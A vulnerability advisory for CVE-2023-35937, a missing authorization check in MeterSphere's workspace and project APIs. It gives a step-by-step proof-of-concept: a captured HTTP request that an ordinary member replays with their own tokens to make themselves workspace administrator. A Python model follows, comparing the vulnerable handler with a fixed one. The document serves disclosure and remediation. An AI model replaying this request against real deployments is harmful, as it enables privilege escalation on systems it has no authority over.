Headline
CVE-2023-35937: MeterSphere missing permission check vulnerability
MeterSphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in MeterSphere lack permission checks. This allows ordinary users to execute APIs that should only be executable by workspace administrators or project administrators. For example, an ordinary user can be updated to a workspace administrator. Version 2.10.2 LTS contains a patch for this issue.
Summary
Some key MeterSphere APIs currently lack permission checks, for example the workspace endpoints /setting/workspace/member/update, /setting/user/special/ws/member/add and /special/ws/member/delete/{workspaceId}/{userId}, as well as the project-related APIs.
PoC
Using the workspace endpoint /setting/workspace/member/update as the example:
1 user1 is a workspace administrator of workspace1
2 user2 is an ordinary member of workspace1
3 user1 updates user2's information, for example promoting user2 to workspace administrator
4 Intercept the request with Burp Suite
The intercepted request to /setting/workspace/member/update:
POST /setting/workspace/member/update HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 144
Accept-Language: zh-CN
WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
Connection: close
{"id":"user2","name":"user2","email":"[email protected]","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
5 Replace the CSRF-TOKEN and X-AUTH-TOKEN in the request above with user2's, i.e. send the request as user2
6 The request succeeds, i.e. an ordinary user can perform the update that only an administrator should be able to perform
Impact
Ordinary users can execute APIs that only workspace administrators or project administrators should be able to execute, for example updating an ordinary user to a workspace administrator.
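The missing check described above, and the kind of check that closes it, as an added example (this is not MeterSphere's code): a minimal Python model of the /setting/workspace/member/update handler in its unchecked form next to a form that requires the caller to hold ws_admin in the workspace named by the request. The in-memory membership table, the function names and the ws_member group id are assumptions made for illustration; ws_admin is the group id that appears in the PoC request body.

```python
"""Model of the missing-authorization bug behind CVE-2023-35937 and its fix.

Added example, not MeterSphere's code. The membership table, helper names and
the "ws_member" group id are assumptions; "ws_admin" comes from the advisory's
request body.
"""
from dataclasses import dataclass, field

WS_ADMIN = "ws_admin"    # group id used in the advisory's request body
WS_MEMBER = "ws_member"  # assumed group id for an ordinary member


class Forbidden(Exception):
    """Raised when the caller lacks the role the endpoint requires."""


@dataclass
class Workspace:
    # user id -> set of group ids the user holds in this workspace
    members: dict[str, set[str]] = field(default_factory=dict)


def is_workspace_admin(ws: Workspace, user_id: str) -> bool:
    return WS_ADMIN in ws.members.get(user_id, set())


def update_member_vulnerable(ws: Workspace, caller: str, target: str,
                             group_ids: set[str]) -> None:
    """Mirrors the pre-2.10.2 behaviour the advisory describes: the caller only
    has to be authenticated (any member); nothing verifies that the caller
    administers the workspace before the target's groups are rewritten."""
    if caller not in ws.members:
        raise Forbidden("not a member of this workspace")  # authentication only
    ws.members[target] = set(group_ids)


def update_member_fixed(ws: Workspace, caller: str, target: str,
                        group_ids: set[str]) -> None:
    """Same operation with the authorization check the advisory says is missing.

    `ws` must be the workspace resolved from the workspaceId in the request
    (the WORKSPACE header / body field in the PoC), not a workspace taken from
    the caller's session; otherwise an admin of one workspace could modify
    the membership of another."""
    if not is_workspace_admin(ws, caller):
        raise Forbidden(f"{caller} is not an administrator of this workspace")
    ws.members[target] = set(group_ids)


def escalation_succeeds(handler) -> bool:
    """Replays the advisory's scenario (user2, an ordinary member, sends the
    admin's update request as themselves) against a handler and reports
    whether user2 ended up as workspace admin."""
    ws = Workspace(members={"user1": {WS_ADMIN}, "user2": {WS_MEMBER}})
    try:
        handler(ws, caller="user2", target="user2", group_ids={WS_ADMIN})
    except Forbidden:
        return False
    return is_workspace_admin(ws, "user2")


if __name__ == "__main__":
    print("vulnerable handler lets a member self-promote:",
          escalation_succeeds(update_member_vulnerable))
    print("fixed handler lets a member self-promote:    ",
          escalation_succeeds(update_member_fixed))
```

The design point is that the check is tied to the resource the request names: the role lookup is done in the workspace identified by the request's workspaceId, and the legitimate flow (user1, an admin, promoting user2) still works under the fixed handler.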